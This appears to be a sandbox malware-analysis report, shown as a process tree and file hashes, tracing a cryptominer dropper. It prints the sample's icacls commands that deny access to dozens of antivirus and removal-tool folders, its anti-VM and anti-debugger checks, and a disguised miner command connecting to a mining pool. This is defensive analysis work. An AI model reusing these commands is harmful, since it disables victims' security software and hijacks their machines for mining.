C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\system32\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)2⤵PID:1136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\system32\icacls.exeicacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)2⤵PID:928
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\icacls.exeicacls C:\FRST /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵PID:3604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)3⤵PID:3192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)3⤵PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2316
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)3⤵PID:32
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)2⤵PID:1276
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)2⤵PID:4368
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)3⤵PID:4092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)2⤵PID:724
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)2⤵PID:1672
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)3⤵PID:3540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵PID:3128
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2764
-
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵PID:652
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵PID:4796
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:5072
-
C:\Windows\system32\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)2⤵PID:3240
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5056
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵PID:2840
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)2⤵PID:4564
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\HitmanPro" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵PID:3140
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵PID:1052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "%username%":(OI)(CI)(F)2⤵PID:4612
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵PID:3168
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)2⤵PID:1300
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵PID:4736
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1040
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:2472
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:3480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)2⤵PID:4312
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:4592
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)2⤵PID:4092
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)2⤵PID:2308
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)2⤵PID:5064
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1712
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)2⤵PID:2372
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵PID:1852
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵PID:692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)2⤵PID:4952
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)3⤵PID:4768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)2⤵PID:4076
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)2⤵PID:3060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4796
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)2⤵PID:400
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)2⤵PID:3744
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3240
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵PID:4324
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵PID:2652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)2⤵PID:4564
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)2⤵PID:4416
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)2⤵PID:112
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)2⤵PID:876
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)2⤵PID:2844
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)3⤵PID:2520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)2⤵PID:1708
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)2⤵PID:3480
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)3⤵PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)2⤵PID:1948
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵PID:4248
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)2⤵PID:4988
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2308
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)2⤵PID:4944
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)2⤵PID:1712
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)2⤵PID:2400
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)2⤵PID:3904
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)2⤵PID:4880
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)2⤵PID:4892
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)2⤵PID:3568
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)2⤵PID:1036
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)2⤵PID:5056
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)2⤵PID:3320
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)3⤵PID:5108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)2⤵PID:2740
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)2⤵PID:1052
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵PID:5004
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)2⤵PID:4024
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)2⤵PID:4044
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)2⤵PID:1160
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2660
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)2⤵PID:4976
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)2⤵PID:1708
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)2⤵PID:780
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)3⤵PID:3900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)2⤵PID:2924
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)3⤵PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)2⤵PID:4248
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)2⤵PID:4772
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)2⤵PID:4832
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)2⤵PID:4052
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)2⤵PID:3128
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)2⤵PID:928
-
C:\Windows\system32\icacls.exeicacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)2⤵PID:4120
-
C:\Windows\system32\icacls.exeicacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)2⤵PID:3548
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)2⤵PID:4520
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)3⤵
- Modifies file permissions
PID:208
-
-
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:1884
-
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:/ProgramData/WindowsTask/MicrosoftHost.exe -o stratum+tcp://zpdb.xyz:3333 -u RandomX_CPU --donate-level=1 -k --cpu-priority=0 -t42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1432
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD5e8ffe812b5a2d068d85ca363b3517c32
SHA1a12dd68e7cb09bfcf08a3c61162230f92fd74f55
SHA25655bb09f52b39deb0de2a2ec4bd05624ac4de1b6a7a576cc9ac0eaf6342aebb1d
SHA5126b14d3d649e077c0a099de43683939405cefb058398fed2ebcd9a952066413f82f3e4a7a9722141cf86927702deeea1604cb2fc90d2ea5935241e19d523e5a56
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
Filesize
7.1MB
MD5bcbb6f2d561ea3b6cd8f3cfc13486b9e
